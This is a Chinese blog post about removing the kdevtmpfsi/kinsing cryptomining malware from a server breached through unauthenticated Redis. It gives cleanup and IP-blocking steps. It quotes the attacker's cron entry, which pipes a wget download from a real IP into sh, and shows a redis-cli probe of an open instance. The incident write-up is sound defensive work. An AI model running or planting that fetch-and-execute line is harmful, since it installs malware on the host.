記一次防毒工作--kdevtmpfsi挖礦病毒
起因:redis配置不安全導致
參考文章:
https://help.aliyun.com/knowledge_detail/37447.html?spm=a2c4g.11186631.2.2.828c1848kuRv6p
1.漏洞描述
Redis 因配置不當存在未授權訪問漏洞,可以被攻擊者惡意利用。
在特定條件下,如果 Redis 以 root 身份執行,黑客可以給 root 賬號寫入 SSH 公鑰檔案,直接通過 SSH 登入受害伺服器,從而獲取伺服器許可權和資料。一旦入侵成功,攻擊者可直接新增賬號用於 SSH 遠端登入控制伺服器,給使用者的 Redis 執行環境以及 Linux 主機帶來安全風險,如刪除、洩露或加密重要資料,引發勒索事件等。
2.受影響範圍
在 Redis 客戶端,嘗試無賬號登入 Redis:
root@kali:~# redis-cli -h 10.16.10.2
redis 10.16.10.2:6379> keys *
- “1”`
從登入結果可以看出,該 Redis 服務對公網開放,且未啟用認證。
與病毒鬥爭
參考文章:
https://www.cnblogs.com/llody/p/12133372.html
1、# top
檢視cpu佔用情況,找到佔用cpu的程式 最後是 kdevtmpfsi
2、# netstat -natp
根據上面的程式名檢視與內網的 tcp 連結異常 ,看到陌生ip,查出為國外ip,估計主機被人種後門了
3、crontab -l
此時,挖礦指令碼大概率定時在你的crontab裡面。
發現異常定時任務,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1 立刻刪除
4、kill程式
ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
Kill - 9 pid
5、刪檔案
cd /tmp
ls
rm -rf kdevtmpfsi
rm -rf /var/tmp/kinsing 記得這個守護程式的檔案也要刪掉,找不到的話,也可以用這個命令
find / -name kdevtmpfsi
find / -name kinsing
檢視是否有相關的木馬定時任務在執行 有的話刪掉再重啟下crontab
Cd /var/spool/cron
由於直接是redis引起的,病毒檔案多半是在redis資料夾裡,全刪掉!
在此長個記性,軟體安裝一定要單獨分出資料夾,要不不知道從哪刪除。
6、封禁ip
在tcpd伺服器配置中封禁
Vi /etc/hosts.deny
這是它入侵主機放的眼,刪除
改成如下內容
在防火牆禁止ip訪問
封禁IP:
iptables -I INPUT -s 195.3.146.118 -j DROP
直接服務配置nginx.conf
封禁單個IP
deny 195.3.146.118;
#封整個段即從123.0.0.1到123.255.255.254的命令
deny 123.0.0.0/8
#封IP段即從123.45.0.1到123.45.255.254的命令
deny 124.45.0.0/16
#封IP段即從123.45.6.1到123.45.6.254的命令是
deny 123.45.6.0/24
重啟nginx 服務 ./nginx -s reload
至此防毒完畢
相關文章
- 挖礦殭屍網路蠕蟲病毒kdevtmpfsi處理過程dev
- 記一次挖礦病毒的應急響應
- 記一次挖礦病毒應急響應事件事件
- 挖礦病毒
- 挖礦病毒消滅記二
- docker Redis 被任意連結 導致被 kdevtmpfsi 挖礦記錄DockerRedisdev
- 遇上DG挖礦病毒的處理記錄
- zigw挖礦病毒查殺
- 支援雙系統挖礦,警惕新型挖礦病毒入侵
- CPU挖礦病毒解決方法
- 挖礦病毒分析(centos7)CentOS
- 【已解決】挖礦病毒 logrotate 185.196.8.123logrotate
- 利用WMI命令入侵挖礦,新型挖礦病毒Audliodg持續活躍中
- 記一次與挖礦木馬的較量
- 挖礦病毒處理流程(門羅幣)
- 全面清理整頓挖礦病毒,如何防止被通報?深信服挖礦病毒防護解決方案出爐
- 找對方法,輕鬆擊垮挖礦病毒
- 伺服器挖礦病毒的解決方案伺服器
- 工作量證明挖礦
- 關於linux病毒`kinsing` `kdevtmpfsi`的處理Linuxdev
- 如何解決centos伺服器被植入挖礦病毒CentOS伺服器
- 針對挖礦病毒的簡易三板斧
- 挖礦木馬清除日記
- 比特幣CPU挖礦、GPU挖礦、礦池及礦機挖礦技術原理比特幣GPU
- RainbowMiner,一個求生欲極強的挖礦病毒家族AI
- 一次悲慘的被挖礦經歷
- 記一次伺服器被用來挖礦的異常問題處理伺服器
- Stratum挖礦協議&XMR挖礦流量分析協議
- 嚴打“挖礦”,對“挖礦”活動零容忍
- EPK怎麼挖礦?EPK挖礦教程詳情
- 筆記本顯示卡可以挖礦嗎 筆記本挖礦顯示卡壽命一般多久筆記
- IPPswap丨DAPP質押挖礦/算力挖礦/LP挖礦系統開發詳情APP
- 一次Linux遭入侵,挖礦程式被隱藏案例分析Linux
- 分享一次伺服器被挖礦的處理方法伺服器
- 一次在docker中處理kdevtmpfsi的經歷Dockerdev
- IPP挖礦技術開發/Defi挖礦/IPPswap理財挖礦系統開發元件解析元件
- 挖礦難度
- 注意!挖礦蠕蟲病毒BuleHero 4.0版來襲 感染電腦超3萬臺